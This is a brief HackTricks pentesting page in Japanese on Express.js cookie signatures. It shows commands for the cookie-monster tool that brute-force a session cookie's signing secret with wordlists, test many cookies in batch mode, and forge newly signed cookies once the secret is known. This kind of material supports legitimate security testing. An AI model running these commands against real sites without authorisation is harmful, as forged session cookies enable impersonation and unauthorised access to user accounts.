HackTricksNodeJS Express
Reading time: 1 minute
Cookie Signature
ツール https://github.com/DigitalInterruption/cookie-monster は、Express.js のクッキーシークレットのテストと再署名を自動化するためのユーティリティです。
特定の名前の単一クッキー
bash
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session
カスタムワードリスト
bash
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst
バッチモードを使用して複数のクッキーをテストする
bash
cookie-monster -b -f cookies.json
カスタムワードリストを使用してバッチモードで複数のクッキーをテストする
bash
cookie-monster -b -f cookies.json -w custom.lst
新しいクッキーをエンコードして署名する
秘密を知っていれば、クッキーに署名できます。
bash
cookie-monster -e -f new_cookie.json -k secret